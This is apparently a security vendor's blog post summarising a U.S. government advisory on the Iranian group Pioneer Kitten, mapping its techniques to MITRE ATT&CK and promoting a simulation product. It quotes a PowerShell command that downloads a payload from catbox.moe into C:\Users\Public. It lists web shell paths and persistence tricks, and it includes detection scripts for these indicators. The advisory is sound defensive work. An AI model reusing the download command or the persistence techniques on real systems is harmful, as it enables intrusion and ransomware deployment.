Pioneer Kitten: Iranian Threat Actors Facilitate Ransomware Attacks Against U.S. Organizations


On August 28th, 2024, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Defense Cyber Crime Center (DC3) released a joint advisory warning organizations about the activities of an Iran-based cyber group known as Fox Kitten [1]. This group, also referred to as Pioneer Kitten, UNC757, Parisite, RUBIDIUM, and Lemon Sandstorm [2], has been exploiting organizations across various sectors in the United States, including education, finance, healthcare, and defense, as well as in Middle Eastern countries such as Israel, Azerbaijan, and the United Arab Emirates. The FBI assesses that these actors aim to develop network access, which is then used in collaboration with ransomware affiliates like BlackCat and NoEscape to deploy ransomware.

In this blog post, we will discuss the tools and techniques used by Pioneer Kitten and how organizations can protect themselves against this threat.

Pioneer Kitten: The Iranian State-sponsored Cyber Actors

Pioneer Kitten, an Iranian state-sponsored cyber group active since 2017, rebranded itself as "xplfinder" in 2024, following its previous name "Br0k3r," which reflected its practice of selling access to compromised networks. The group continued its activities into August 2024, targeting organizations primarily in the U.S. and in Middle Eastern countries such as Israel, Azerbaijan, and the United Arab Emirates. Its primary goal is to gain and sustain unauthorized access to victim networks, which it then exploits for a range of malicious purposes.

Pioneer Kitten leverages this access to collaborate with ransomware affiliates, including NoEscape, RansomHouse, and ALPHV (aka BlackCat), playing a crucial role in facilitating encryption operations and extorting victims. However, the group's involvement goes beyond merely providing access: they actively participate in locking down networks and devising strategies to maximize extortion efforts.

Tactics, Techniques, and Procedures (TTPs) used by Pioneer Kitten

The following is an overview of the TTPs observed in Pioneer Kitten's attack campaigns, showcasing their systematic approach to compromising and exploiting victim networks.

Reconnaissance

T1596 - Search Open Technical Databases

Pioneer Kitten uses the Shodan.io search engine to identify IP addresses hosting network devices affected by known vulnerabilities (tracked as CVEs). By scanning for these weaknesses, the group can locate publicly accessible devices that provide easy entry points into a network, essentially targeting the "low-hanging fruit" that is easiest to exploit.

Initial Access

T1190 - Exploit Public-Facing Application

Pioneer Kitten capitalizes on these identified vulnerabilities in public-facing networking devices to establish initial access to target networks.

Notable vulnerabilities exploited by the group include:

  • Citrix Netscaler: CVE-2019-19781, CVE-2023-3519
  • F5 BIG-IP: CVE-2022-1388
  • Pulse Secure/Ivanti VPNs: CVE-2024-21887
  • PanOS firewalls: CVE-2024-3400
  • Check Point Security Gateways: CVE-2024-24919

Persistence

T1505.003 - Web Shell

After exploiting vulnerable devices, Pioneer Kitten deploys web shells to maintain persistence and capture login credentials. Specific techniques include:

  • Capturing login credentials on compromised Netscaler devices and appending them to a file named netscaler.1, located in the same directory as the web shell.

  • Creating the directory /var/vpn/themes/imgs/ on Citrix Netscaler devices and deploying malicious files there, such as:

    • netscaler.1
    • netscaler.php
    • ctxHeaderLogon.php

  • Deploying additional web shells on compromised Netscaler devices right after system owners patch the exploited vulnerabilities. The new web shells serve as a contingency plan: even if the original vulnerability is fixed, the attackers keep pre-established alternative entry points, reducing the likelihood that they will be completely locked out of the system. The additional web shells were observed at the following file paths:

    • /netscaler/logon/LogonPoint/uiareas/ui_style.php
    • /netscaler/logon/sanpdebug.php

T1136.001 - Create Account (Local Account)

The group creates local accounts on victim networks to maintain access. Observed account names include:

  • "sqladmin$"
  • "adfsservice"
  • "IIS_Admin"
  • "iis-admin"
  • "John McCain"

By creating accounts that mimic legitimate system accounts (e.g., "IIS_Admin," "sqladmin$"), attackers ensure they have ongoing access to the system even if their initial entry method is detected and blocked. These accounts are used for lateral movement within the network, execution of commands, and further exploitation while blending in with regular user activity.

T1098 - Account Manipulation

The attackers request exceptions to zero-trust and other security policies for the tools they intend to use, allowing them to install and run their malicious tools within the victim's network without being blocked or detected.

T1053 - Scheduled Task/Job

Pioneer Kitten uses scheduled tasks to maintain persistence by loading malware through installed backdoors.

For example:

  • A scheduled task named SpaceAgentTaskMgrSHR in the Windows/Spaceport/ task folder uses a DLL side-loading technique to load a payload from version.dll.

  • They also place a malicious backdoor file, version.dll, in the C:\Windows\ADFS\ directory.

T1505 - Server Software Component

Pioneer Kitten also creates a Windows service task that runs automatically each day. They give these tasks random eight-character names to make them less suspicious and harder to detect.

The purpose of these tasks is to execute a DLL file with a matching name in the C:\Windows\system32\drivers\ directory. For example, if the service is named "test," it will try to load and run a file named test.sys in that directory. This technique helps the attackers maintain persistence and evade detection, as the service and its file blend in with legitimate system files.
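The persistence artifacts described above (the account names under T1136.001, the Spaceport scheduled task under T1053, and the eight-character service names under T1505) can be turned into host-log detections. The following Python script is an added example, not code from the advisory or from Picus: it runs three rules over constructed Windows event records, and the event IDs (4720, 4698, 7045), the field names and the WdFilter baseline entry are assumptions about how a SIEM forwards these logs.

```python
import re

# Constructed sample records (not advisory data). Field names follow the Windows
# event logs a SIEM would forward: Security 4720 = local user created,
# Security 4698 = scheduled task created, System 7045 = new service installed.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "IIS_Admin"},
    {"EventID": 4720, "TargetUserName": "jsmith"},
    {"EventID": 4698, "TaskName": r"\Windows\Spaceport\SpaceAgentTaskMgrSHR"},
    {"EventID": 7045, "ServiceName": "qzkd8a1x",
     "ImagePath": r"C:\Windows\system32\drivers\qzkd8a1x.sys"},
    {"EventID": 7045, "ServiceName": "WdFilter",
     "ImagePath": r"C:\Windows\system32\drivers\WdFilter.sys"},
]

# Account names reported for the group, compared case-insensitively.
SUSPECT_ACCOUNTS = {"sqladmin$", "adfsservice", "iis_admin", "iis-admin", "john mccain"}
# Legitimate 8-character driver services also live in drivers\ (WdFilter is one);
# an assumed baseline built from a clean host suppresses them.
BASELINE_SERVICES = {"wdfilter"}
RANDOM_NAME = re.compile(r"^[a-z0-9]{8}$", re.IGNORECASE)
DRIVER_SYS = re.compile(r"\\system32\\drivers\\([^\\]+)\.sys$", re.IGNORECASE)

def check_event(ev, baseline=BASELINE_SERVICES):
    """Return a one-line finding for a suspicious event, or None."""
    eid = ev.get("EventID")
    if eid == 4720 and ev.get("TargetUserName", "").lower() in SUSPECT_ACCOUNTS:
        return f"T1136.001 suspicious local account created: {ev['TargetUserName']}"
    if eid == 4698:
        task = ev.get("TaskName", "")
        if "\\spaceport\\" in task.lower() or "spaceagenttaskmgrshr" in task.lower():
            return f"T1053 scheduled task in Spaceport folder: {task}"
    if eid == 7045:
        name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
        m = DRIVER_SYS.search(path)
        # Random-looking 8-char service whose binary is drivers\<same name>.sys
        if (RANDOM_NAME.match(name) and m and m.group(1).lower() == name.lower()
                and name.lower() not in baseline):
            return f"T1505 eight-character service {name} loading {path}"
    return None

def scan(events, baseline=BASELINE_SERVICES):
    """Run check_event over a list of events and return the findings in order."""
    return [f for f in (check_event(e, baseline) for e in events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The service rule is a triage heuristic: without a baseline it also flags legitimate drivers whose service name happens to be eight characters, so compare against a known-good inventory before alerting.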

Privilege Escalation

T1078.003 - Valid Accounts: Local Accounts

Pioneer Kitten repurposes compromised credentials obtained from exploited networking devices (e.g., Citrix Netscaler) to log into other applications such as Citrix XenDesktop.

This means that the group uses login credentials they have stolen from compromised networking devices, like Citrix Netscaler, to access other systems and applications within the same network. For instance, once they have the credentials, they can log into Citrix XenDesktop, which is a virtual desktop infrastructure (VDI) platform. By doing so, they can move laterally across the network, accessing different parts of the system to further their attack.

T1078.002 - Valid Accounts: Domain Accounts

The attackers reuse stolen admin credentials from network administrators to gain access to domain controllers and other key systems within the victim's network. This level of access is highly dangerous, as it allows them to control vital network functions, escalate privileges, spread malware, and exfiltrate sensitive data, putting the entire network at serious risk.

Defense Evasion

T1562.001 - Impair Defenses: Disable or Modify Tools

The group uses administrator credentials to disable antivirus and security software, neutralizing the defenses that could detect, block, or remove their malicious tools and activities (behaviour characteristic of so-called hunter-killer malware). By disabling these security controls, they ensure that their malware can run uninterrupted, maintaining their foothold on the compromised systems without being detected or hindered by protective measures.

Credential Access

T1056 - Input Capture

Pioneer Kitten captures login credentials using web shells and other malicious tools deployed on compromised devices.

Execution

T1059.001 - Command and Scripting Interpreter

Pioneer Kitten leverages stolen administrator accounts to start remote desktop sessions and run commands on the compromised system. They often use tools like Microsoft Windows PowerShell to do this:

Invoke-WebRequest -Uri http://files.catbox.moe/ -OutFile C:\Users\Public\malware.exe

The explanation of this PowerShell command is as follows:

  • Invoke-WebRequest: Makes an HTTP/S request to a specified URL.

  • -Uri http://files.catbox.moe/: The command is reaching out to a site called "catbox.moe" to download a file.

  • -OutFile C:\Users\Public\malware.exe: The file is saved in the C:\Users\Public\ directory with the name "malware.exe" (not the real name of the malware).

They also enable servers to use Windows PowerShell Web Access to execute their commands remotely.
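Detection for the download command above can key on PowerShell script block logging (Event ID 4104, ScriptBlockText). The following Python script is an added example, not code from the advisory or from Picus: it parses the -Uri and -OutFile arguments of an Invoke-WebRequest call from constructed script-block text and flags downloads from catbox.moe (the host from the advisory) or drops into assumed staging paths such as C:\Users\Public.

```python
import re
from urllib.parse import urlparse

# Constructed PowerShell script-block log entries (Event ID 4104, ScriptBlockText);
# the first mirrors the command quoted above, the rest are made up for contrast.
SAMPLE_SCRIPT_BLOCKS = [
    r"Invoke-WebRequest -Uri http://files.catbox.moe/ -OutFile C:\Users\Public\malware.exe",
    r'iwr -Uri "https://files.catbox.moe/abcd.bin" -OutFile "C:\Windows\Temp\a.bin"',
    r"Invoke-WebRequest -Uri https://updates.example.internal/agent.msi -OutFile 'C:\Program Files\Vendor\agent.msi'",
    r"Get-Process | Where-Object { $_.CPU -gt 100 }",
]

SUSPECT_HOSTS = {"catbox.moe"}  # from the advisory; extend with your own list
STAGING_DIRS = (r"c:\users\public", r"c:\windows\temp")  # assumed drop locations
CMDLET = re.compile(r"\b(Invoke-WebRequest|iwr)\b", re.IGNORECASE)
# -Name value: double-quoted, single-quoted (may contain spaces) or a bare token
ARG_TEMPLATE = r'''-%s\s+(?:"([^"]*)"|'([^']*)'|(\S+))'''

def arg_value(name, text):
    m = re.search(ARG_TEMPLATE % name, text, re.IGNORECASE)
    if not m:
        return None
    return next(g for g in m.groups() if g is not None)

def parse_download(script_block):
    """Return (host, out_path) when the block is an Invoke-WebRequest download, else None."""
    if not CMDLET.search(script_block):
        return None
    uri, out = arg_value("Uri", script_block), arg_value("OutFile", script_block)
    if not (uri and out):
        return None
    return (urlparse(uri).hostname or "").lower(), out

def reasons(script_block):
    """List why a script block looks like a download cradle; empty list = no finding."""
    parsed = parse_download(script_block)
    if not parsed:
        return []
    host, out = parsed
    found = []
    # Match the host itself or any subdomain (files.catbox.moe -> catbox.moe)
    if any(host == h or host.endswith("." + h) for h in SUSPECT_HOSTS):
        found.append(f"download from file-sharing host {host}")
    if out.lower().startswith(STAGING_DIRS):
        found.append(f"payload written to world-writable path {out}")
    return found

if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        print(reasons(block) or "clean", "<-", block)
```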

Discovery

T1012 - Query Registry

Pioneer Kitten exports registry hives and network firewall configurations to gather detailed information about system settings, security policies, and network architecture.

T1482 - Domain Trust Discovery

Additionally, the group performs domain trust discovery by exfiltrating account usernames from the domain controller and accessing configuration files and logs. This allows them to map out domain relationships and identify critical assets, which they can leverage for further exploitation and lateral movement within the network.

Command and Control

T1219 - Remote Access Software

Pioneer Kitten installs remote access software such as AnyDesk and MeshCentral on compromised systems to maintain control.

From an attacker's perspective, installing remote access software on compromised systems ensures a consistent and reliable foothold in the network. These tools allow the attacker to remotely access and control the system at any time, without needing to re-exploit vulnerabilities or re-establish access if the initial entry point is detected and removed. By using widely recognized remote access tools, attackers also blend in with legitimate administrative activity, making their presence harder to detect.

T1572 - Protocol Tunneling

Pioneer Kitten leverages tools like Ligolo and NGROK to establish encrypted tunnels that facilitate stealthy communication with their command and control servers.

  • Ligolo sets up a reverse tunnel from the compromised system back to the attacker's machine. It encapsulates network traffic within an encrypted tunnel, allowing the attacker to access internal network resources remotely. By routing traffic through this tunnel, the attacker can operate as if they were on the local network, evading detection by security measures that focus on direct outbound connections.

  • NGROK creates a secure tunnel by linking the compromised system to a publicly accessible subdomain. This tunnel forwards traffic from NGROK's external server to the local system, disguising it as legitimate HTTPS traffic. This method helps the attacker bypass firewalls and intrusion detection systems, which may overlook such traffic as routine.

Exfiltration and Impact

T1657 - Exfiltration Over Web Service

After infiltrating victim networks, Pioneer Kitten collaborates with ransomware affiliates, including NoEscape, RansomHouse, and ALPHV (aka BlackCat). They provide these affiliates with access to the compromised networks in exchange for a share of the ransom payments. The actors also engage in data theft, likely supporting the goals of the Iranian government or other financially motivated objectives.

How Picus Helps Simulate Pioneer Kitten Attacks

We strongly suggest simulating Pioneer Kitten attacks with the Picus Security Validation Platform to test the effectiveness of your security controls against sophisticated cyber attacks. You can also test your defenses against hundreds of other state-sponsored threat actors, such as APT40, Lazarus, and Volt Typhoon, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Pioneer Kitten aka Fox Kitten and its affiliates:

| Threat ID | Threat Name | Attack Module |
|---|---|---|
| 99935 | Fox Kitten Campaign Malware Email Threat | E-mail Infiltration |
| 57995 | Fox Kitten Campaign Malware Download Threat | Network Infiltration |
| 64903 | NoEscape Ransomware Download Threat | Network Infiltration |
| 28790 | NoEscape Ransomware Email Threat | E-mail Infiltration |
| 75742 | BlackCat Ransomware Campaign 2022 | Windows Endpoint |
| 93524 | BlackCat Ransomware Campaign 2022 | Linux Endpoint |
| 92332 | BlackCat Ransomware Email Threat | E-mail Infiltration |
| 54213 | BlackCat Ransomware Download Threat | Network Infiltration |
| 75365 | The RansomHouse Threat Group Campaign Malware Download | Network Infiltration |
| 41775 | The RansomHouse Threat Group Campaign Malware Email Threat | E-mail Infiltration |

Picus also provides actionable mitigation content. The Picus Mitigation Library includes prevention signatures for preventive security controls that address the malware and vulnerabilities exploited by the Pioneer Kitten group. Currently, Picus Labs has validated the following signatures for Pioneer Kitten:

| Security Control | Signature ID | Signature Name |
|---|---|---|
| CheckPoint | 0E10524C1 | Trojan.Win32.Generic.TC.b77eSYFZ |
| CheckPoint | 0A316073D | Ransomware.Win32.NoEscape.TC.23f6HLVp |
| CheckPoint | 0CC97E9AB | Trojan-Ransom.Win32.Cryptor.TC.4e5eBKGN |
| Forcepoint | | File_Malware-Blocked |
| Fortinet AV | 6176954 | MSIL/Tiny.BQ!tr.dldr |
| Fortinet AV | 8182900 | Riskware/SSHNet |
| Fortinet AV | 62183 | PossibleThreat |
| Fortinet AV | 10140397 | W32/Filecoder_Avaddon.H!tr.ransom |
| Fortinet AV | 10147974 | W32/Avaddon.H!tr.ransom |
| Fortinet AV | 10153973 | Linux/Filecoder_NoEscape.B!tr |
| Fortinet AV | 10137650 | ELF/Babuk.D597!tr.ransom |
| Fortinet AV | 10054921 | Linux/Filecoder_Babyk.A!tr |
| Trellix | 0x4840c900 | MALWARE: Malicious File Detected by GTI |
| Palo Alto | 179774634 | Trojan-Veil/Win32.flrh.a |
| Palo Alto | 333471849 | trojan/Win32 EXE.htool.ar |
| Palo Alto | 612809409 | trojan/Linux.noescape.h |
| Palo Alto | 605194932 | Ransom/Win32.noescape.e |
| Palo Alto | 587399268 | Trojan/Win32.cryptinject.hqu |
| Palo Alto | 619620462 | Ransom/Linux.noescape.m |
| Palo Alto | 584113416 | Ransom/Linux.esxiargs.a |
| Palo Alto | 607701795 | Trojan-Ransom/Linux.babuk.cy |
| Palo Alto | 627436494 | Ransom/Linux.mario.i |
| Palo Alto | 628705521 | Ransom/Linux.babuk.ep |
| Cisco FirePower | | W32.D42F454627-100.SBX.VIOC |
| Cisco FirePower | | Win.Noescape.tii.Talos |
| Cisco FirePower | | W32.Auto:2c1a4f.in03.Talos |
| Cisco FirePower | | W32.Auto:d36afc.in03.Talos |
| Cisco FirePower | | W32.Auto:3934b3.in03.Talos |
| Cisco FirePower | | W32.Auto:afe398.in03.Talos |
| Cisco FirePower | | Auto.0A77E5.262364.in02 |

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations," Cybersecurity and Infrastructure Security Agency (CISA). [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a

[2] Fraunhofer FKIE, "Fox Kitten (Threat Actor)," Malpedia. [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/actor/fox_kitten. [Accessed: Aug. 28, 2024]